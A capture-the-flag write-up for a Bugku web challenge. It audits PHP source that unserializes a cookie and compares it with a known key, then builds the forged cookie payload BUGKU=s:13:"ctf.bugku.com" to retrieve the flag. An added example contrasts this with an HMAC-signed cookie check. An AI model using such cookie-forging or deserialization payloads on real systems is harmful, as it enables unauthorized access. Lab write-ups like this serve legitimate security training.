0. Open the web page and view the source code
A hint was found in a comment in the CSS file: /* try ?19492 */
1. Visit ?19492 to view the PHP source code
2. Code audit
<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['19492'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
    echo "$flag";
}
else {
?>
Line-by-line reading of the relevant statements:
$KEY='ctf.bugku.com';  // assigns the string ctf.bugku.com to the variable $KEY
$cookie = $_COOKIE['BUGKU'];  // reads the cookie named BUGKU and assigns its value to the variable $cookie
elseif (unserialize($cookie) === "$KEY")  // if the deserialized cookie is strictly equal to $KEY, that is, unserialize($cookie) === "ctf.bugku.com",
{
    echo "$flag";  // then the flag is output
}
3. Construct the payload
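Serialize the string ctf.bugku.com. PHP's serialize() encodes a string as s:<length>:"<value>"; and ctf.bugku.com is 13 characters long, so the cookie is: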
BUGKU=s:13:"ctf.bugku.com";
The final payload: BUGKU=s:13:"ctf.bugku.com"
4. Send the payload as a cookie with the request; there are two methods here
(1) Send it using HackBar
(2) Use Burp Suite to capture the request and send the payload
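
The check audited in step 2 accepts any cookie the client builds, because the value it compares against is a constant readable from the source. The following added example (not part of the challenge or of the original write-up) puts that pattern beside a hardened form in which the server signs the cookie with an HMAC and never calls unserialize() on client input. SERVER_SECRET and the function names weak_check, issue_cookie and strong_check are hypothetical, and all inputs are constructed.

```php
<?php
declare(strict_types=1);
// Added example; SERVER_SECRET and all function names are hypothetical.
const SERVER_SECRET = 'constructed-demo-secret-kept-on-the-server';

// Pattern from the audited source: deserialize the cookie and compare it
// with a constant that anyone who can read the source also knows.
function weak_check(string $cookie, string $key): bool
{
    return unserialize($cookie) === $key;
}

// Hardened form: the server issues base64(value) "." HMAC-SHA256(value).
function issue_cookie(string $value): string
{
    return base64_encode($value) . '.' . hash_hmac('sha256', $value, SERVER_SECRET);
}

// Returns the authenticated value, or null if the cookie was not issued here.
function strong_check(string $cookie): ?string
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    $value = base64_decode($parts[0], true);   // strict mode rejects stray bytes
    if ($value === false) {
        return null;
    }
    $expected = hash_hmac('sha256', $value, SERVER_SECRET);
    return hash_equals($expected, $parts[1]) ? $value : null;  // constant-time compare
}

// Constructed inputs.
$clientBuilt = 's:13:"ctf.bugku.com";';        // cookie value from step 3
$issued      = issue_cookie('ctf.bugku.com');  // minted on the server side
$tampered    = base64_encode('admin') . substr($issued, strpos($issued, '.'));

var_dump(weak_check($clientBuilt, 'ctf.bugku.com')); // weak check, client-built value
var_dump(strong_check($clientBuilt));                // signed check, client-built value
var_dump(strong_check($issued));                     // signed check, server-issued cookie
var_dump(strong_check($tampered));                   // signed check, value swapped, MAC reused
```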